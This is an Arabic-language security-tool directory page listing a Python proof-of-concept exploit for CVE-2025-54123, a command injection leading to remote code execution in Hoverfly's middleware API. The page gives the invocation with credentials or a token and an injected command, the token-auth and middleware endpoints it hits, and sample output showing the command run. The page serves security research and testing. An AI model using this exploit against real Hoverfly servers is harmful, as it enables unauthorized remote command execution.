Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/0xk4rth1/cve-2025-54123
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةالتعلم والتعليم
GitHub0xk4rth1/cve-2025-54123

CVE-2025-54123

إثبات المفهوم بلغة Python لـ CVE-2025-54123، يوضح ثغرة حقن الأوامر المؤدية إلى تنفيذ التعليمات البرمجية عن بعد (RCE) في واجهة برمجة تطبيقات الوسيطة (middleware API) الخاصة بـ Hoverfly مع المصادقة باستخدام بيانات الاعتماد أو الرمز المميز.

عرض المستودع
23منذ 2 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-54123: هجوم حقن الأوامر في Hoverfly إلى تنفيذ التعليمات البرمجية عن بُعد (PoC)

نظرة عامة

يحتوي هذا المستودع على نص برمجي لإثبات المفهوم (PoC) بلغة Python للتفاعل مع مثيلات Hoverfly المتأثرة بـ CVE-2025-54123.

يدعم النص البرمجي:

  • المصادقة باستخدام اسم المستخدم وكلمة المرور
  • المصادقة باستخدام رمز حامل موجود
  • التفاعل مع نقطة نهاية واجهة برمجة تطبيقات الوسيطة (middleware) الخاصة بـ Hoverfly
  • عرض مخرجات استجابة واجهة برمجة التطبيقات

تحذير

هذا المشروع مخصص فقط لأغراض البحث الأمني المصرح به والاختبار والتعليم. لا تستخدمه ضد الأنظمة دون إذن صريح.


المتطلبات

  • Python 3.8+
  • requests

تثبيت التبعيات:

root@kitploit:~
pip install requests

الاستخدام

المصادقة باستخدام بيانات الاعتماد

root@kitploit:~
python CVE-2025-54123.py \
  --target example.com \
  --port 8888 \
  -u admin \
  -p password \
  --cmd "id"

المصادقة باستخدام رمز موجود

root@kitploit:~
python CVE-2025-54123.py \
  --target example.com \
  --port 8888 \
  --token <ACCESS_TOKEN> \
  --cmd "id"

الوسائط

الوسيطةالوصف
--targetاسم المجال أو عنوان IP الهدف
--portمنفذ الخدمة الهدف
-uاسم مستخدم Hoverfly
-pكلمة مرور Hoverfly
--tokenرمز حامل موجود
--cmdسلسلة الأمر المرسلة إلى نقطة نهاية الوسيطة

تدفق المصادقة

عند تقديم بيانات الاعتماد:

  1. يتم إرسال طلب POST إلى:
root@kitploit:~
/api/token-auth
  1. يتم استخراج الرمز المُرجع.
  2. يُستخدم الرمز للمصادقة على الطلبات اللاحقة.

نقطة نهاية واجهة برمجة التطبيقات

يتصل النص البرمجي بـ:

root@kitploit:~
/api/v2/hoverfly/middleware

باستخدام طلب PUT مُوثَق.


مثال على المخرجات

root@kitploit:~
Approaching target : example.com
Attempting login to http://example.com:8888/api/token-auth
Checking Credentials....
Login Successful!
Injected : id
uid=1000(user) gid=1000(user)

هيكل المشروع

root@kitploit:~
.
├── CVE-2025-54123.py
└── README.md

إخلاء مسؤولية

هذا المستودع مقدم للأغراض التعليمية والأمنية الدفاعية والاختبار المصرح به فقط. لا يتحمل المؤلف أي مسؤولية عن سوء الاستخدام أو الضرر أو العواقب القانونية الناتجة عن استخدام هذا البرنامج.

تنزيل الأداة